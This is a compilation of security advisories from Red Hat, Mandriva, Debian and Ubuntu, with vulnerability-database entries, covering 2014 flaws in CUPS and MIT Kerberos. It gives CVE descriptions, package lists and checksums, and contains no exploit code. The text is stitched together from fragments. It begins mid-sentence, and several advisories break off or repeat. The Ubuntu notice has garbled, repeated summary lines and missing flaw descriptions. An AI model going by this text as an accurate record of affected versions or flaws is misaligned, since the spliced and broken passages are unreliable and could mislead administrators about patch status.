In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: cups security and bug fix update
Advisory ID: RHSA-2014:1388-02
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1388.html
Issue date: 2014-10-14
CVE Names: CVE-2014-2856 CVE-2014-3537 CVE-2014-5029
CVE-2014-5030 CVE-2014-5031
=====================================================================
1. Summary:
Updated cups packages that fix multiple security issues and several bugs
are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
CUPS provides a portable printing layer for Linux, UNIX, and similar
operating systems.
An attacker could use this flaw to perform a cross-site scripting attack
against users of the CUPS web interface. (CVE-2014-2856)
It was discovered that CUPS allowed certain users to create symbolic links
in certain directories under /var/cache/cups/. (CVE-2014-3537, CVE-2014-5029, CVE-2014-5030, CVE-2014-5031)
The CVE-2014-3537 issue was discovered by Francisco Alonso of Red Hat
Product Security.
These updated cups packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes.
All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing this
update, the cupsd daemon will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
978387 - Bad IPP responses with version 2.0 (collection handling bug)
1012482 - /etc/cron.daily/cups breaks rule GEN003080 in Red Hat security guide
1087122 - CVE-2014-2856 cups: cross-site scripting flaw fixed in the 1.7.2 release
1115576 - CVE-2014-3537 cups: insufficient checking leads to privilege escalation
1122600 - CVE-2014-5029 cups: Incomplete fix for CVE-2014-3537
1128764 - CVE-2014-5030 cups: allows local users to read arbitrary files via a symlink attack
1128767 - CVE-2014-5031 cups: world-readable permissions
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
ppc64:
cups-1.4.2-67.el6.ppc64.rpm
cups-debuginfo-1.4.2-67.el6.ppc.rpm
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-devel-1.4.2-67.el6.ppc.rpm
cups-devel-1.4.2-67.el6.ppc64.rpm
cups-libs-1.4.2-67.el6.ppc.rpm
cups-libs-1.4.2-67.el6.ppc64.rpm
cups-lpd-1.4.2-67.el6.ppc64.rpm
s390x:
cups-1.4.2-67.el6.s390x.rpm
cups-debuginfo-1.4.2-67.el6.s390.rpm
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-devel-1.4.2-67.el6.s390.rpm
cups-devel-1.4.2-67.el6.s390x.rpm
cups-libs-1.4.2-67.el6.s390.rpm
cups-libs-1.4.2-67.el6.s390x.rpm
cups-lpd-1.4.2-67.el6.s390x.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
ppc64:
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-php-1.4.2-67.el6.ppc64.rpm
s390x:
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-php-1.4.2-67.el6.s390x.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-2856.html
https://www.redhat.com/security/data/cve/CVE-2014-3537.html
https://www.redhat.com/security/data/cve/CVE-2014-5029.html
https://www.redhat.com/security/data/cve/CVE-2014-5030.html
https://www.redhat.com/security/data/cve/CVE-2014-5031.html
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/cups.html#RHSA-2014-1388
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUPKsIXlSAg2UNWIIRApSvAJ9WxP5yQ+v5GDRGnSINYq0Pro0AoQCfXZqW
WjIIQcBG+Sou8Is2vIFlLok=
=5S/K
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
A malformed file with an invalid page header and compressed raster data
can trigger a buffer overflow in cupsRasterReadPixels (CVE-2014-9679).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679
http://advisories.mageia.org/MGASA-2014-0193.html
http://advisories.mageia.org/MGASA-2014-0313.html
http://advisories.mageia.org/MGASA-2015-0067.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
0d1f31885b6c118b63449f2fdd821666 mbs2/x86_64/cups-1.7.0-8.1.mbs2.x86_64.rpm
b5337600a386f902763653796a2cefdf mbs2/x86_64/cups-common-1.7.0-8.1.mbs2.x86_64.rpm
7b1513d85b5f22cd90bed23a35e44f51 mbs2/x86_64/cups-filesystem-1.7.0-8.1.mbs2.noarch.rpm
c25fa9b9bba101274984fa2b7a62f7a3 mbs2/x86_64/lib64cups2-1.7.0-8.1.mbs2.x86_64.rpm
df24a6b84fdafffaadf961ab4aa3640b mbs2/x86_64/lib64cups2-devel-1.7.0-8.1.mbs2.x86_64.rpm
5c172624c992de8ebb2bf8a2b232ee3a mbs2/SRPMS/cups-1.7.0-8.1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVF6q1mqjQ0CJFipgRAuxXAKDq8A/WlNzp54yRN7xnKy8ZBaRZQwCfSAh0
n7hHPzmYVzh2wFP6PffIl0E=
=ykhv
-----END PGP SIGNATURE-----
.
For the stable distribution (wheezy), these problems have been fixed in
version 1.5.3-5+deb7u4.
For the unstable distribution (sid), these problems have been fixed in
version 1.7.4-2
| VAR-201407-0462 | CVE-2014-4342 | MIT Kerberos 5 Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
MIT Kerberos 5 (aka krb5) 1.7.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (buffer over-read or NULL pointer dereference, and application crash) by injecting invalid tokens into a GSSAPI application session. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability due to a NULL pointer dereference error.
An attacker may exploit this issue to crash the affected service, resulting in denial-of-service conditions.
Kerberos 5 versions 1.7.0 through 1.12.11 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
For the stable distribution (wheezy), these problems have been fixed in
version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in
version 1.12.1+dfsg-7. ==========================================================================
Ubuntu Security Notice USN-2310-1
August 11, 2014
krb5 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu
12.04 LTS. This
issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected
Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
(CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon
incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
krb5-admin-server 1.12+dfsg-2ubuntu4.2
krb5-kdc 1.12+dfsg-2ubuntu4.2
krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2
krb5-otp 1.12+dfsg-2ubuntu4.2
krb5-pkinit 1.12+dfsg-2ubuntu4.2
krb5-user 1.12+dfsg-2ubuntu4.2
libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2
libgssrpc4 1.12+dfsg-2ubuntu4.2
libk5crypto3 1.12+dfsg-2ubuntu4.2
libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2
libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2
libkdb5-7 1.12+dfsg-2ubuntu4.2
libkrad0 1.12+dfsg-2ubuntu4.2
libkrb5-3 1.12+dfsg-2ubuntu4.2
libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS:
krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5
krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5
krb5-user 1.10+dfsg~beta1-2ubuntu0.5
libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5
libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5
libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5
libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5
libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5
libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS:
krb5-admin-server 1.8.1+dfsg-2ubuntu0.13
krb5-kdc 1.8.1+dfsg-2ubuntu0.13
krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13
krb5-pkinit 1.8.1+dfsg-2ubuntu0.13
krb5-user 1.8.1+dfsg-2ubuntu0.13
libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13
libgssrpc4 1.8.1+dfsg-2ubuntu0.13
libk5crypto3 1.8.1+dfsg-2ubuntu0.13
libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13
libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13
libkdb5-4 1.8.1+dfsg-2ubuntu0.13
libkrb5-3 1.8.1+dfsg-2ubuntu0.13
libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4341
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4344
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4345
http://advisories.mageia.org/MGASA-2014-0345.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 1/X86_64:
3d717913ec53cd745cbaa0ea46321815 mbs1/x86_64/krb5-1.9.2-3.5.mbs1.x86_64.rpm
e11b2338f4265d9241013211644543d9 mbs1/x86_64/krb5-pkinit-openssl-1.9.2-3.5.mbs1.x86_64.rpm
3dd7ce5af9b798a3be7fb22f3598e3a7 mbs1/x86_64/krb5-server-1.9.2-3.5.mbs1.x86_64.rpm
a86c6a16fa6091672020b97d5873fc7f mbs1/x86_64/krb5-server-ldap-1.9.2-3.5.mbs1.x86_64.rpm
c56d0f9b2f4f5b7145db65efd8d3627f mbs1/x86_64/krb5-workstation-1.9.2-3.5.mbs1.x86_64.rpm
67a0a6fc9192328cedd811db760089b4 mbs1/x86_64/lib64krb53-1.9.2-3.5.mbs1.x86_64.rpm
ff121251269cab55a574bc5a06c739b0 mbs1/x86_64/lib64krb53-devel-1.9.2-3.5.mbs1.x86_64.rpm
0308ef62a73141b5f0915251796608c7 mbs1/SRPMS/krb5-1.9.2-3.5.mbs1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update
Advisory ID: RHSA-2015:0439-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html
Issue date: 2015-03-05
CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343
CVE-2014-4344 CVE-2014-4345 CVE-2014-5352
CVE-2014-5353 CVE-2014-9421 CVE-2014-9422
CVE-2014-9423
=====================================================================
1. Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and
add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
Kerberos is a networked authentication system which allows clients and
servers to authenticate to each other with the help of a trusted third
party, the Kerberos KDC.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. A remote, unauthenticated attacker could
use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind)
when it was used with an LDAP back end for the KDC database. A remote,
authenticated attacker could potentially use this flaw to execute arbitrary
code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5
library processed valid context deletion tokens. An attacker able to make
an application using the GSS-API library (libgssapi) call the
gss_process_context_token() function could use this flaw to crash that
application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote,
authenticated attacker with the permissions to set the password policy
could crash kadmind by attempting to use a named ticket policy object as a
password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid
External Data Representation (XDR) data. An authenticated user could use
this flaw to crash the MIT Kerberos administration server (kadmind), or
other applications using Kerberos libraries, using specially crafted XDR
packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind)
incorrectly accepted certain authentication requests for two-component
server principal names. A remote attacker able to acquire a key with a
particularly named principal (such as "kad/x") could use this flaw to
impersonate any user to kadmind, and perform administrative actions as that
user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS
implementation (libgssrpc) handled certain requests. An attacker could send
a specially crafted request to an application using libgssrpc to disclose a
limited portion of uninitialized memory used by that application.
(CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled
certain requests. A remote, unauthenticated attacker able to inject packets
into a client or server application's GSSAPI session could use either of
these flaws to crash the application. (CVE-2014-4341, CVE-2014-4342)
A double-free flaw was found in the MIT Kerberos SPNEGO initiators. An
attacker able to spoof packets to appear as though they are from an GSSAPI
acceptor could use this flaw to crash a client application that uses MIT
Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the
CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT
Kerberos project acknowledges Nico Williams for helping with the analysis
of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which
provides a number of bug fixes and enhancements, including:
* Added plug-in interfaces for principal-to-username mapping and verifying
authorization to user accounts.
* When communicating with a KDC over a connected TCP or HTTPS socket, the
client gives the KDC more time to reply before it transmits the request to
another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
* The Kerberos client library did not recognize certain exit statuses that
the resolver libraries could return when looking up the addresses of
servers configured in the /etc/krb5.conf file or locating Kerberos servers
using DNS service location. The library could treat non-fatal return codes
as fatal errors. Now, the library interprets the specific return codes
correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
* Added support for contacting KDCs and kpasswd servers through HTTPS
proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
4. Solution:
All krb5 users are advised to upgrade to these updated packages, which
correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf
1102837 - Please backport improved GSSAPI mech configuration
1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly
1109919 - Backport https support into libkrb5
1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext
1118347 - ksu non-functional, gets invalid argument copying cred cache
1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens
1121789 - CVE-2014-4343: use-after-free crash in SPNEGO
1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators
1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens
1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure
1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)
1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update
1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name
1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)
1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)
1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)
1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)
1184629 - kinit loops on principals on unknown error
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
ppc64:
krb5-debuginfo-1.12.2-14.el7.ppc.rpm
krb5-debuginfo-1.12.2-14.el7.ppc64.rpm
krb5-devel-1.12.2-14.el7.ppc.rpm
krb5-devel-1.12.2-14.el7.ppc64.rpm
krb5-libs-1.12.2-14.el7.ppc.rpm
krb5-libs-1.12.2-14.el7.ppc64.rpm
krb5-pkinit-1.12.2-14.el7.ppc64.rpm
krb5-server-1.12.2-14.el7.ppc64.rpm
krb5-server-ldap-1.12.2-14.el7.ppc64.rpm
krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x:
krb5-debuginfo-1.12.2-14.el7.s390.rpm
krb5-debuginfo-1.12.2-14.el7.s390x.rpm
krb5-devel-1.12.2-14.el7.s390.rpm
krb5-devel-1.12.2-14.el7.s390x.rpm
krb5-libs-1.12.2-14.el7.s390.rpm
krb5-libs-1.12.2-14.el7.s390x.rpm
krb5-pkinit-1.12.2-14.el7.s390x.rpm
krb5-server-1.12.2-14.el7.s390x.rpm
krb5-server-ldap-1.12.2-14.el7.s390x.rpm
krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-4341
https://access.redhat.com/security/cve/CVE-2014-4342
https://access.redhat.com/security/cve/CVE-2014-4343
https://access.redhat.com/security/cve/CVE-2014-4344
https://access.redhat.com/security/cve/CVE-2014-4345
https://access.redhat.com/security/cve/CVE-2014-5352
https://access.redhat.com/security/cve/CVE-2014-5353
https://access.redhat.com/security/cve/CVE-2014-9421
https://access.redhat.com/security/cve/CVE-2014-9422
https://access.redhat.com/security/cve/CVE-2014-9423
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi
gZD8EL2lSaLXnIQxca8zLTg=
=aK0y
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6) - i386, x86_64
3.
It was found that if a KDC served multiple realms, certain requests could
cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes
| VAR-201407-0138 | CVE-2014-3537 | CUPS of Web Vulnerability to read arbitrary files in the interface |
CVSS V2: 1.2 CVSS V3: - Severity: Low |
The web interface in CUPS before 1.7.4 allows local users in the lp group to read arbitrary files via a symlink attack on a file in /var/cache/cups/rss/. CUPS is prone to a local privilege-escalation vulnerability.
An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Other attacks may also be possible.
An attacker with local access could potentially exploit this issue to gain elevated privileges.
Versions prior to CUPS 1.7.4 are vulnerable. The system is based on the Internet Printing Protocol (IPP) and provides most PostScript and raster printer services. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: cups security and bug fix update
Advisory ID: RHSA-2014:1388-02
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1388.html
Issue date: 2014-10-14
CVE Names: CVE-2014-2856 CVE-2014-3537 CVE-2014-5029
CVE-2014-5030 CVE-2014-5031
=====================================================================
1. Summary:
